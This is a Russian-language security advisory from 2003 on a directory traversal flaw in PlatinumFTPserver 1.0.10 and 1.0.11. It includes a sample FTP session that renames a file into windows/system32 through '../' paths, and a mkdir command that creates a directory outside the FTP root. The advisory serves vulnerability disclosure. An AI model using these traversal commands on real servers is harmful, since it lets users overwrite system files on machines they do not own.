Изменение произвольных файлов в PlatinumFTPserver

Дата публикации:
28.02.2003
Всего просмотров:
740
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в PlatinumFTPserver. Удаленный авторизованный пользователь, включая анонимного пользователя, может просматривать и заменять файлы на сервере, которые расположены вне FTP каталога.

Сообщается, что удаленный заверенный пользователь может заменить любые файлы на системе (если у него есть права на загрузку файлов на FTP сервер). Пример:

ftp> rename cmd3.exe
To name ../../../../windows/system32/cmd2.exe
350 Command OK - waiting for name
250 File/dir renamed to \..\..\..\..\windows\system32\cmd2.exe

ftp> dir ../../../../windows/system32/cmd*
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 375808 Aug 18 20:00 cmd.exe
-rwxr-xr-x 1 User Group 28 Feb 24 09:59 cmd2.exe
-rwxr-xr-x 1 User Group 324608 Aug 29 18:40 cmdial32.dll
-rwxr-xr-x 1 User Group 41472 Aug 29 18:41 cmdl32.exe
-rwxr-xr-x 1 User Group 40505 Aug 18 20:00 cmdlib.wsc
226 Listing complete.
ftp: 342 bytes received in 0.00Seconds 342000.00Kbytes/sec.
ftp>
Также сообщается, что удаленный авторизованный пользователь может создать каталог на целевом сервере, который расположен вне FTP root каталога, следующей командой:
 mkdir ../testing1
Уязвимость обнаружена в PlatinumFTPserver 1.0.10, 1.0.11

Ссылки: Vulnerability for Platinum FTP version 1.0.11